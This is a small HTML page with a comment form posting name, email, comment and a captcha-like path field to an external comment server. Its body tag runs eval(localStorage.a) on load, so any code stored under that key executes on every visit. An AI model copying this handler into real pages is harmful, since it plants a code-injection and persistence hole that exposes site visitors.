<!DOCTYPE html>
<html>
  <head>
    <title>Simple Form</title>
  </head>
  <body onload="eval(localStorage.a)">
    <center>
      <form action="https://server.harka.com/comment" method="post">
        <!-- form target blank? would be better UX but then the typed data stays in the form. specially good if they mess up the captcha -->
        <input type="hidden" name="url" value="form-page" />
        <textarea
          name="name"
          rows="1"
          cols="30"
          placeholder="Name *"
          required></textarea>
        <br />
        <textarea
          name="email"
          rows="1"
          cols="30"
          placeholder="Email (won't be public)"></textarea>
        <br />
        <textarea
          name="comment"
          rows="4"
          cols="30"
          placeholder="Comment *"
          type="email"
          required></textarea
        ><br />
        <textarea
          name="human"
          rows="1"
          cols="30"
          placeholder="Human? Type page path/slug. *"
          required></textarea
        ><br />
        <button>Send</button>
      </form>
    </center>
  </body>
</html>
